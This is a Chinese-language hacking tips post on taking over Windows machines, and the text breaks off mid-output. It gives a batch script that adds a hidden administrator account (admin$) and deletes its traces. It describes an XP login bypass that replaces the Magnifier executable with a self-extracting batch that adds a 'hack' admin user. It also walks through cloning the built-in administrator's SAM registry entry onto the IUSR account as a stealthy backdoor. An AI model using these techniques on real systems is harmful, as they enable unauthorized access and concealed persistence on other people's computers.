1。直接adminstrator进,试一下
2.高级办法就是当你进入系统时,再复制一个管理员
并隐藏掉它要用到这个文件HideAdmin.exe
@echooff
@netuseradmin$love1314/add
@netlocalgroupadministratorsadmin$/add
@HideAdminadminlove1314
@delc:\\windows\\system32\\1208\\HideAdmin.exe
@delc:\\windows\\system32\\1208\\admin.bat
3.有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼,现在就来解决的方法.
所需工具
1.U盘一个
2.Usboot(U盘启动制作软件)
3.winrar(压缩软件)
成功的绕过了XP的登陆密码.
方法很简单,当机器出现登陆框,要求输入密码时,你按下windows键U看看有什么反映……?不错!出现了辅助工具管理工具。既然可以运行放大镜程序,那么我们把放大镜程序换成其他的程序是不是也可以运行呢?(把它换成添加用户的程序不就…)现在开始制作。
①.制作U盘启动盘。先运行Usboot,然后插入U盘,选中U盘然后点开始。(要破坏U盘上的文件哦!小心!),格式化完了把U盘拔了,然后它会提示你再插入,插入U盘1分后就可以了!我的U盘是1G的,用的HDD格式。
②.制作替换文件。要制作一个XX.EXE的文件来替换原文件,但是这个XX.EXE执行后又要达到添加用户的要求。我首先想到的是写一个批处理文件:
@netuserhack123456/add
@netlocalgroupadministraroeshack/add
@exit
然后保存为XX.bat就可以了!
用winrar制作一个自解压文件,不就把XX.bat变成XX.EXE了吗?运行XX.EXE就等同运行了XX.bat.(把XX.EXE拷到U盘上去)
③.替换文件.到COMS里去把第一启动换到USB-HDD,保存----插入U盘,进入系统的c:\\windows\\system32下去.copymagnify.exe007magnify.exe(对magnify.exe进行备份,magnify.exe为放大镜执行程序).在把U盘上的XX.EXE拷到system32下,并该为magnify.exe就可以了!
然后从硬盘启动就可以了!再到XP登陆密码时,只要运行放大镜就可以了!按下CtrlAltDel(按2次)用新建的hack用户就可以进去了!进去把管理员密码改过来吧!
这样就成功的绕过了XP的登陆密码,只要了一个U盘,好方便.
4.首先要让大家知道的概念是在Windows2000和WindowsNT里,默认管理员帐号的SID是固定的
500(0x1f4),那么可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在
这里选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,选择了这个帐号,
所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows2000S
erver。
运行一个System的CMDShell(或使用H
ttp://),然后在该CMDShell里面运行
regedit/eadam.regHKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4
这样将SID为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文
件的第三行--[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4]最后的\"1F
4\"修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安
装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg
文件中的\"1F4\"修改为\"3E9\"后执行
regedit/sadam.reg
导入该Reg文件
然后运行
netuserIUSR_MachineNameSometips
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)
OK,
这样,拥有和默认管理员一样的桌面、一样的Profile.....
而且,当运行netlocalgroupadministrators时,看看结果:
C:\\netlocalgroupadministrators
Aliasnameadministrators
CommentAdministratorshavecompleteandunrestrictedaccesstothecompu
ter/domain
Members |
